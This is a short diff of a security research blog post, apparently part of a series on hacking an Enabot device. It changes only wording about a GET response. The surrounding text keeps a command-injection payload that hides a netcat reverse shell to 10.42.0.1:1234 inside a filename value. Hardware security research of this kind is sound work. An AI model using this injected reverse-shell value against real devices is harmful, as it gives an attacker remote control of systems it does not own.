debugmen/debugmen.github.io/_posts/2022-03-10-enabot_series_part_3.md

 To validate the file was transferred successfully, it calculates the md5sum and validates it matches the ```md5_token=``` value we sent in the GET response.

-To do the command injection in our get response we send this as the filename
+To do the command injection in our `GET` response we send this as the filename

 ```filename=file;nc 10.42.0.1 1234 -e sh;#.tar```